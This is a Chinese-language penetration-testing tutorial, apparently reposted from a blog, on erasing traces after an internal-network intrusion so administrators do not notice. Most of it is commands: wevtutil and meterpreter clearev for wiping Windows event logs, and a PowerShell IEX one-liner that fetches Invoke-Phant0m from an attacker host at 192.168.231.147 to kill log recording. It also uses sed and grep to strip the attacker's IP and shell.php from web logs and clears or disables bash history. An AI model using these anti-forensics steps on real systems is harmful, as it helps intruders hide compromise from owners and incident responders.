Windows&Linux痕跡清除

文章目錄

• Windows&Linux痕跡清除
• 前言
• Windows痕跡清除
• Windows日志清理
• meterpreter清理日志
• Linux痕跡清除
• 后記

前言

當我們進行內網一系列的滲透之后，就會留下一些命令的痕跡，我們離開的時候，為了防止管理員發現，我們就需要進行內網滲透最后一個環節的內容了，就是進行痕跡清除。命令有點多，大家好好做一下筆記吧。

Windows痕跡清除

Windows日志
如何查看：
事件查看器->windows日志
win+r eventvwr.msc

保存路徑：
C:\Windows\System32\winevt\Logs

（1）在控制面板中的管理工具中，本地安全策略中的本地策略中的審核策略一些事件的開啟（以管理員身份運行）
（2）在事件查看器中的安全，右鍵點擊屬性，查看日志的路徑

Windows日志清理

（1）wevtutil.exe：
用于檢索有關事件日志和發布者的信息，安裝和卸載事件清單，運行查詢以及導出，存檔和清除日志

#獲取security的最近十條日志
wevtutil.exe qe Security /f:text /rd:true /c:10
#獲取security的前十條日志
wevtutil.exe qe Security /f:text /c:10
#默認視圖xml查看（text視圖不會輸出EventRecordID）
wevtutil.exe qe Security /rd:true /c:10

#導出security所有日志到1.evtx
wevtutil.exe epl security 1.evtx

wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl “windows powershell”

有相關的命令可以使用

meterpreter清理日志

（2）meterpreter清理日志（必須是在管理員的權限下才能清除）
刪除所有在滲透過程中使用的工具
刪除之前添加的賬號：net user username /del
刪除應用程序，系統安全日志：clearev #分別清除了應用程序，系統和安全模塊的日志記錄。
關閉所有的meterpreter連接：sessions -K

查看事件日志：run event_manager -i
刪除事件日志：run event_manager -c

停止日志記錄工具
https://github.com/hlldz/Invoke-Phant0m

日志進程分析工具
Process Hacker 2

利用腳本讓日志功能失效，無法記錄日志
powershell “IEX(new-object system.net.webclient).downloadstring(‘http://192.168.231.147:8000/Invoke-Phant0m.ps1’);Invoke-Phant0m”

我來大家講解一下具體的停止日志記錄步驟吧
首先，下載Invoke-Phant0m到klai上進行監聽，也就是這個腳本


我們放入到kali的tools下

打開python中的http服務進行監聽

我們查看一下win7的日志進程是哪個，看PID，打開任務管理器，找window服務主進程，svhost.exe

進入服務后，找到eventlog，看到日志記錄的進程時812

進入Process Hacker查看一下進程

點擊查看一下進程

我這里是已經顯示停止了日志的進程了，因為剛才實驗的時候，忘記截圖了，沒能還原之前的記錄了。

之前的是有log記錄的，我們已經在kali中監聽了，我們返回到win7中執行以下腳本，看看有沒有回應
powershell “IEX(new-object system.net.webclient).downloadstring(‘http://192.168.231.147:8000/Invoke-Phant0m.ps1’);Invoke-Phant0m”



這里就顯示已經停止了。

這里也返回了回應，實驗成功了。這時候，我們創建一個用戶，看看在事件查看器中是否記錄我們的創建的日志


發現并沒有被記錄，停止日志記錄成功了。

Linux痕跡清除

（清除日志都必須要管理員權限）
ssh遠程登錄會產生登錄日志
last /var/log/wtmp 所成功登錄/登出的歷史記錄
lastb /var/log/btmp 登錄號失敗嘗試記錄
lastlog /var/log/lastlog 最近登錄記錄
w,who /var/log/utmp 記錄當前登錄的每個用戶的信息，它之保留當前連接的用戶記錄

命令的輸出包括：登錄名，上次登錄時間，IP地址，端口

web日志
/var/log/httpd/access.log
/var/log/nginx/access.log
/var/log/apache2/access.log

web日志清理
（grep -v，剔除某個元素）
cat /var/log/nginx/access.log|grep -v shell.php > /tmp/a.log（重定向的a.log文件）
cat /tmp/a.log > /var/log/nginx/access.log

touch a.txt
vi a.txt
123 456 789
cat a.txt | grep -v 123
cat a.txt | grep -v 123 > b.txt
cat b.txt

sed -i -e “/dvwa/d” ./access.log
sed -i -e “/favicon/d” ./access.log（正則匹配，刪除含有某個在字符串的日志）

刪除所有與改ip相關的地址刪除掉
sed -i -e “/192.168.231.147/d” ./access.log日志

定時任務日志
/var/log/cron：記錄了系統定時任務相關的日志（可以用sed命令刪除）
/var /log/secure：記錄驗證和授權方面的信息，只要設計賬號和密碼的程序都會記錄，比如ssh登錄，su切換用戶，sudo授權，甚至添加用戶和修改用戶密碼都會記錄在這個日志文件中。

操作歷史記錄
history：顯示歷史記錄
~/.bash_history：歷史記錄文件

history -w
history -c（只是刪除了早緩存中的history記錄）
cat .bash_history

（寫入到.bash_history，-c，清空，>轉入到 .bash_history）
刪除全部歷史記錄：history -w && history -c && > .bash_history
history -w && history -c && > ~/.bash_history
刪除指定行的歷史記錄：history -d 111
備份還原歷史記錄：cp .bash_history his.txt
刪除100行以后的歷史記錄：sed -i “100,$d” .bash_history

隱藏歷史記錄
開啟無痕模式，禁用命令歷史記錄功能
set +o history
恢復
set -o history

后記

痕跡清除主要還是一些清除的命令，內網滲透的內容就到這里就結束了。接下來有空的話，給大家講解一下打靶的內容，大家要好好復習呀。

總結

以上是生活随笔為你收集整理的内网渗透-WindowsLinux痕迹清除的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。